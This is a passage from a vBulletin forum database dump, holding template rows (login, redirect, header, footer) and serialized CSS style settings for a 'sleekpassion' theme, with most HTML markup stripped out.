    \r\n\r\n\r\n \r\n \")).\"\r\n\r\n
    \r\n
    \r\n
    \r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n\r\n$headinclude\r\n$pagetitle\r\n$headinsert\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[vbulletin_message]
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n $postvars\r\n\r\n \r\n \r\n\r\n \r\n\r\n\r\n
    $vbphrase[not_logged_no_permission]
    \r\n\r\n
      \r\n
    1. $vbphrase[not_logged_in_fill_in_form]
    2. \r\n
    3. $vbphrase[may_not_have_sufficient_privileges]
    4. \r\n
    5. $vbphrase[administrator_may_disabled_account]
    6. \r\n
    \r\n\r\n
    \r\n $vbphrase[log_in]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[username]:
    $vbphrase[password]:
    \r\n $vbphrase[forgotten_your_password]\r\n \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    $vbphrase[admin_required_register]
    \r\n
    \r\n\r\n \r\n \r\n \r\n\r\n\r\n

    $errormessage

    \r\n\r\n\r\n \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n\r\n', 'template', 1208876155, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1739, -1, 'STANDARD_ERROR_LOGIN', '$stylevar[htmldoctype]\r\n\r\n\r\n\".(($show[\'search_noindex\']) ? (\"\") : (\"\")).\"\r\n$headinclude\r\n $pagetitle\r\n$headinsert\r\n\r\n\r\n$header\r\n\r\n\r\n


    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[vbulletin_message]
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n scriptpath . \"\\\" />\r\n \r\n \r\n $postvars\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n

    $errormessage

    \r\n\r\n
    \r\n $vbphrase[log_in]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[username]:
    $vbphrase[password]:
    \r\n session->vars[\'sessionurl\'] . \"do=lostpw\\\">$vbphrase[forgotten_your_password]\r\n \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n \".(($show[\'register_message\']) ? (\"\r\n
    \" . construct_phrase(\"$vbphrase[admin_required_register]\", \"register.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=signup\") . \"
    \r\n \") : (\"\")).\"\r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\".((!$show[\'enableforumjump\']) ? (\"\r\n\r\n\r\n\r\n \r\n\r\n
    $forumjump
    \r\n\r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n\r\n$headinclude\r\n $pagetitle\r\n$headinsert\r\n\r\n\r\n$header\r\n\r\n\r\n


    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[vbulletin_message]
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n \r\n \r\n \r\n $postvars\r\n\r\n \r\n \r\n\r\n

    $errormessage

    \r\n\r\n
    \r\n $vbphrase[log_in]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[username]:
    $vbphrase[password]:
    \r\n $vbphrase[forgotten_your_password]\r\n \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n \r\n
    $vbphrase[admin_required_register]
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n
    $forumjump
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876137, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1740, -1, 'STANDARD_REDIRECT', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$pagetitle\r\n\r\n\r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[redirecting]
    \r\n
    \r\n\r\n
    \r\n

     

    \r\n

    $errormessage

    \r\n \".(($postvars) ? (\"\r\n $postvars\r\n

    $vbphrase[click_the_following_button]

    \r\n \r\n \") : (\"\r\n

    $vbphrase[click_if_browser_does_not_redirect]

    \r\n
     
    \r\n \")).\"\r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n\".(($postvars) ? (\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\") : (\"\r\n\r\n\r\n\r\n\r\n\r\n\")).\"\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$pagetitle\r\n\r\n\r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[redirecting]
    \r\n
    \r\n\r\n
    \r\n

     

    \r\n

    $errormessage

    \r\n \r\n $postvars\r\n

    $vbphrase[click_the_following_button]

    \r\n \r\n \r\n

    $vbphrase[click_if_browser_does_not_redirect]

    \r\n
     
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n', 'template', 1210330703, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1741, 2, '.alt1, .alt1Active', 'a:7:{s:10:\"background\";s:7:\"#F1F1F1\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:55:\"border-top:1px solid #FFF;\r\nborder-left:1px solid #FFF;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1236982758, 'unenergizer', '', 'vbulletin'), (1742, 2, '.alt2, .alt2Active', 'a:7:{s:10:\"background\";s:7:\"#F1F1F1\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:55:\"border-top:1px solid #FFF;\r\nborder-left:1px solid #FFF;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1236982758, 'unenergizer', '', 'vbulletin'), (1743, 2, '.fjsel', 'a:2:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";}', '', 'css', 1203620154, 'littlewhitelines', '', 'vbulletin'), (1744, 2, '.inlinemod', 'a:7:{s:10:\"background\";s:7:\"#FFFFCC\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1236984323, 'unenergizer', '', 'vbulletin'), (1745, 2, '.page', 'a:7:{s:10:\"background\";s:7:\"#FFFFFF\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1236982224, 'unenergizer', '', 'vbulletin'), (1746, 2, '.panel', 'a:7:{s:10:\"background\";s:79:\"#E4E7F5 url(images/sleekpassion/gradients/gradient_panel.gif) repeat-x top left\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:35:\"padding: 10px;\r\nborder: 2px outset;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1236984323, 'unenergizer', '', 'vbulletin'), (1747, 2, '.panelsurround', 'a:4:{s:10:\"background\";s:87:\"#D1D4E0 url(images/sleekpassion/gradients/gradient_panelsurround.gif) repeat-x top left\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";}', '', 'css', 1236984323, 'unenergizer', '', 'vbulletin'), (1748, 2, '.tborder', 'a:4:{s:10:\"background\";s:7:\"#D9D9D9\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:25:\"border:1px solid #D9D9D9;\";}', '', 'css', 1236982224, 'unenergizer', '', 'vbulletin'), (1749, 2, '.tcat', 'a:7:{s:10:\"background\";s:78:\"#26607D url(images/sleekpassion/gradients/gradient_tcat.gif) repeat-x top left\";s:5:\"color\";s:7:\"#EDEFF4\";s:4:\"font\";a:3:{s:5:\"style\";s:4:\"bold\";s:4:\"size\";s:4:\"10pt\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#ffffff\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#ffffff\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:9:\"underline\";}}', '', 'css', 1236984323, 'unenergizer', '', 'vbulletin'), (1750, 2, '.tfoot', 'a:7:{s:10:\"background\";s:7:\"#204252\";s:5:\"color\";s:7:\"#EDEFF4\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#EDEFF4\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E0E0F6\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1236984323, 'unenergizer', '', 'vbulletin'), (1751, 2, '.thead', 'a:7:{s:10:\"background\";s:79:\"#EFEFEF url(images/sleekpassion/gradients/gradient_thead.gif) repeat-x top left\";s:5:\"color\";s:7:\"#4C6072\";s:4:\"font\";a:3:{s:5:\"style\";s:4:\"bold\";s:4:\"size\";s:4:\"11px\";s:6:\"family\";s:78:\"tahoma, verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#4C6072\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#4C6072\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1236982758, 'unenergizer', '', 'vbulletin'), (1752, 2, '.vbmenu_control', 'a:7:{s:10:\"background\";s:79:\"#EFEFEF url(images/sleekpassion/gradients/gradient_thead.gif) repeat-x top left\";s:5:\"color\";s:7:\"#4C6072\";s:4:\"font\";a:3:{s:5:\"style\";s:4:\"bold\";s:4:\"size\";s:4:\"11px\";s:6:\"family\";s:78:\"tahoma, verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:47:\"padding: 3px 6px 3px 6px;\r\nwhite-space: nowrap;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#4C6072\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#4C6072\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:9:\"underline\";}}', '', 'css', 1236984323, 'unenergizer', '', 'vbulletin'), (1753, 2, '.vbmenu_hilite', 'a:7:{s:10:\"background\";s:8:\"#245A75 \";s:5:\"color\";s:7:\"#E16C04\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"11px\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:38:\"white-space: nowrap;\r\ncursor: pointer;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:4:\"none\";}}', '', 'css', 1236984508, 'unenergizer', '', 'vbulletin'), (1754, 2, '.vbmenu_option', 'a:7:{s:10:\"background\";s:7:\"#F1F1F1\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"11px\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:38:\"white-space: nowrap;\r\ncursor: pointer;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#455867\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#455867\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#455867\";s:15:\"text-decoration\";s:4:\"none\";}}', '', 'css', 1236984459, 'unenergizer', '', 'vbulletin'), (1755, 2, '.vbmenu_popup', 'a:4:{s:10:\"background\";s:7:\"#D9D9D9\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:25:\"border:1px solid #D9D9D9;\";}', '', 'css', 1236984323, 'unenergizer', '', 'vbulletin'), (1756, 2, '.wysiwyg', 'a:7:{s:10:\"background\";s:7:\"#F5F5FF\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"10pt\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:42:\"margin: 5px 10px 10px 10px;\r\npadding: 0px;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#4C6072\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#4C6072\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1236984323, 'unenergizer', '', 'vbulletin'), (1757, 2, 'body', 'a:7:{s:10:\"background\";s:7:\"#134A5E\";s:5:\"color\";s:7:\"#235167\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"10pt\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:27:\"margin: 0px;\r\npadding: 0px;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#4C6072\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#4C6072\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:9:\"underline\";}}', '', 'css', 1425037126, 'opensc', '', 'vbulletin'), (1758, 2, 'EXTRA2', 'a:1:{s:3:\"all\";s:391:\".sitenav {\r\nbackground:#235167 url(images/sleekpassion/gradients/nav_x.gif) repeat-x top left;\r\n}\r\n\r\n.pagebg {\r\nbackground:#FFF url(images/sleekpassion/gradients/page_bg.gif) repeat-x top left;\r\n}\r\n\r\n.leftside {\r\nbackground:#235167 url(images/sleekpassion/gradients/page_ls.gif) repeat top;\r\n}\r\n\r\n.rightside {\r\nbackground:#235167 url(images/sleekpassion/gradients/page_rs.gif) repeat top;\r\n}\";}', '', 'css', 1236982224, 'unenergizer', '', 'vbulletin'), (1759, 2, 'td.inlinemod', 'a:7:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1203620154, 'littlewhitelines', '', 'vbulletin'), (1760, 2, 'imgdir_attach', 'images/sleekpassion/attach', '', 'stylevar', 1205099838, 'Hoxxy', '', 'vbulletin'), (1761, 2, 'imgdir_button', 'images/sleekpassion/buttons', '', 'stylevar', 1205099838, 'Hoxxy', '', 'vbulletin'), (1762, 2, 'imgdir_editor', 'images/sleekpassion/editor', '', 'stylevar', 1205099838, 'Hoxxy', '', 'vbulletin'), (1763, 2, 'imgdir_misc', 'images/sleekpassion/misc', '', 'stylevar', 1205099838, 'Hoxxy', '', 'vbulletin'), (1764, 2, 'imgdir_poll', 'images/sleekpassion/polls', '', 'stylevar', 1205099838, 'Hoxxy', '', 'vbulletin'), (1765, 2, 'imgdir_rating', 'images/sleekpassion/rating', '', 'stylevar', 1205099838, 'Hoxxy', '', 'vbulletin'), (1766, 2, 'imgdir_reputation', 'images/sleekpassion/reputation', '', 'stylevar', 1205099838, 'Hoxxy', '', 'vbulletin'), (1767, 2, 'imgdir_statusicon', 'images/sleekpassion/statusicon', '', 'stylevar', 1205099838, 'Hoxxy', '', 'vbulletin'), (1768, 2, 'outertablewidth', '770', '', 'stylevar', 1236742732, 'unenergizer', '', 'vbulletin'), (1769, 2, 'titleimage', '', '', 'stylevar', 1420399737, 'admin', '', 'vbulletin'), (1770, 2, 'forumhome_forumbit_level2_post', '
    \\\"\\\"\r\n
    \r\n session->vars[\'sessionurl\'] . \"f=$forum[forumid]\\\">$forum[title]\r\n \".(($show[\'browsers\']) ? (\"(\" . construct_phrase(\"$vbphrase[x_viewing]\", \"$forum[browsers]\") . \")\") : (\"\")).\"\r\n
    \r\n \".(($show[\'forumdescription\']) ? (\"
    $forum[description]
    \") : (\"\")).\"\r\n \".(($show[\'forumsubscription\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'subforums\']) ? (\"
    $vbphrase[subforums]: $forum[subforums]
    \") : (\"\")).\"\r\n
    $forum[lastpostinfo]$forum[threadcount]$forum[replycount]
    $forum[moderators] 
    \"\"\r\n
    \r\n $forum[title]\r\n ($vbphrase[x_viewing])\r\n
    \r\n
    $forum[description]
    \r\n \r\n
    $vbphrase[subforums]: $forum[subforums]
    \r\n
    $forum[lastpostinfo]$forum[threadcount]$forum[replycount]
    $forum[moderators] 
    \r\n \r\n \r\n \r\n
    $vbphrase[twitter_integration]
    \r\n ', '
    \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[twitter_integration]
    \r\n
    ', 'template', 1247609295, 'Jeremy', '1.0.3', 'kk_vbtwitter'), (1919, 2, 'footer', '$ad_location[ad_footer_start]\r\n\r\n
    \r\n
    $vbphrase[all_times_are_gmt_x_time_now_is_y]
    \r\n
    \r\n\r\n$spacer_close\r\n\r\n\r\n
    options[\'forumhome\'] . \".php\\\" method=\\\"get\\\" style=\\\"clear:$stylevar[left]\\\">\r\n\r\n\r\n\r\n \r\n\r\n
    \r\n\r\n
    \r\n \r\n Powered by: xPRJ
    \r\n $vbphrase[powered_by_vbulletin]\r\n \r\n
    \r\n\r\n
    \r\n \r\n $cronimage\r\n \r\n\r\n \" . $GLOBALS[\'vbulletin\']->options[\'copyrighttext\'] . \"\r\n
    \r\n \r\n
    \r\n
    \r\n\r\n\r\n\r\n \".(($show[\'quickchooser\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'languagechooser\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \".(($show[\'contactus\']) ? (\"options[\'contactuslink\'] . \"\\\" rel=\\\"nofollow\\\" accesskey=\\\"9\\\">$vbphrase[contact_us] -\") : (\"\")).\"\r\n \".(($GLOBALS[\'vbulletin\']->options[\'hometitle\']) ? (\"options[\'homeurl\'] . \"\\\">\" . $GLOBALS[\'vbulletin\']->options[\'hometitle\'] . \" -\") : (\"\")).\"\r\n \".(($show[\'admincplink\']) ? (\"session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[admin] -\") : (\"\")).\"\r\n \".(($show[\'modcplink\']) ? (\"session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[mod] -\") : (\"\")).\"\r\n \".(($GLOBALS[\'vbulletin\']->options[\'archiveenabled\']) ? (\"$vbphrase[archive] -\") : (\"\")).\"\r\n $template_hook[footer_links]\r\n \".(($GLOBALS[\'vbulletin\']->options[privacyurl]) ? (\"options[\'privacyurl\'] . \"\\\">$vbphrase[privacy_statement] -\") : (\"\")).\"\r\n \".(($GLOBALS[\'vbulletin\']->options[tosurl]) ? (\"options[\'tosurl\'] . \"\\\">$vbphrase[terms_of_service] -\") : (\"\")).\"\r\n $vbphrase[top]\r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$ad_location[ad_footer_end]\r\n\r\n\".(($show[\'dst_correction\']) ? (\"\r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n
    \r\n\r\n\r\n\r\n\") : (\"\")).\"\r\n
    \r\n', '$ad_location[ad_footer_start]\r\n\r\n
    \r\n
    $vbphrase[all_times_are_gmt_x_time_now_is_y]
    \r\n
    \r\n\r\n$spacer_close\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n
    \r\n\r\n
    \r\n \r\n Powered by: xPRJ
    \r\n $vbphrase[powered_by_vbulletin]\r\n \r\n
    \r\n\r\n
    \r\n \r\n $cronimage\r\n \r\n\r\n $vboptions[copyrighttext]\r\n
    \r\n \r\n
    \r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n$ad_location[ad_footer_end]\r\n\r\n\r\n\r\n
    \r\n \r\n \r\n \r\n
    \r\n\r\n\r\n\r\n
    \r\n
    \r\n', 'template', 1456238871, 'admin', '3.8.7', 'vbulletin'), (1920, 2, 'header', '\r\n

    \r\n
    \r\n \r\n

    \r\n
    \r\n\r\n\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n\".(($show[\'member\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \r\n \r\n\".(($show[\'member\']) ? (\"\r\n \r\n\") : (\"\r\n \r\n\")).\"\r\n \r\n
    options[\'forumhome\'] . \".php\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl_q\'] . \"\\\">\\\"Home\\\"session->vars[\'sessionurl_q\'] . \"\\\">\\\"$vbphrase[user_cp]\\\"session->vars[\'sessionurl_q\'] . \"\\\">\\\"$vbphrase[members_list]\\\"session->vars[\'sessionurl_q\'] . \"\\\">\\\"$vbphrase[calendar]\\\"session->vars[\'sessionurl\'] . \"do=getnew\\\" accesskey=\\\"2\\\">\\\"$vbphrase[new_posts_nav]\\\"session->vars[\'sessionurl_q\'] . \"\\\" accesskey=\\\"5\\\">\\\"$vbphrase[faq]\\\"session->vars[\'sessionurl\'] . \"do=logout&logouthash=\" . $GLOBALS[\'vbulletin\']->userinfo[\'logouthash\'] . \"\\\" onclick=\\\"return log_out(\'$vbphrase[sure_you_want_to_log_out]\')\\\">\\\"$vbphrase[log_out]\\\"session->vars[\'sessionurl_q\'] . \"\\\" rel=\\\"nofollow\\\">\\\"Register\\\"
    \r\n
    \r\n\r\n\r\n\r\n \r\n\r\n
    \\\"\\\"
    \r\n\r\n$spacer_open\r\n\r\n$_phpinclude_output\r\n\r\n$ad_location[ad_header_end]', '\r\n

    \r\n
    \r\n \r\n

    \r\n\r\n\r\n\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n
    \"Home\"\"$vbphrase[user_cp]\"\"$vbphrase[members_list]\"\"$vbphrase[calendar]\"\"$vbphrase[new_posts_nav]\"\"$vbphrase[faq]\"\"$vbphrase[log_out]\"\"Register\"
    \r\n
    \r\n\r\n\r\n\r\n \r\n\r\n
    \"\"
    \r\n\r\n$spacer_open\r\n\r\n$_phpinclude_output\r\n\r\n$ad_location[ad_header_end]', 'template', 1457521108, 'admin', '3.8.7', 'vbulletin'), (1922, 2, 'headinclude', '\r\noptions[\'templateversion\'] . \"\\\" />\r\n\r\n\".(($show[\'threadinfo\']) ? (\"\r\noptions[\'keywords\'] . \"\\\" />\r\n1) ? (\"\" . construct_phrase(\"$vbphrase[page_x]\", \"$pagenumber\") . \"-\") : (\"\")).\"$threadinfo[prefix_plain_html] $threadinfo[title] $foruminfo[title_clean]\\\" />\r\n\") : (\"\".(($show[\'foruminfo\']) ? (\"\r\noptions[\'keywords\'] . \"\\\" />\r\n1) ? (\"\" . construct_phrase(\"$vbphrase[page_x]\", \"$pagenumber\") . \"-\") : (\"\")).\"$foruminfo[description_clean]\\\" />\r\n\") : (\"\r\noptions[\'keywords\'] . \"\\\" />\r\noptions[\'description\'] . \"\\\" />\r\n\")).\"\")).\"\r\n\r\n\r\n$style[css]\r\n\".((is_browser(\'opera\') AND !is_browser(\'opera\', \'8.0.1\')) ? (\"\r\n\r\n\") : 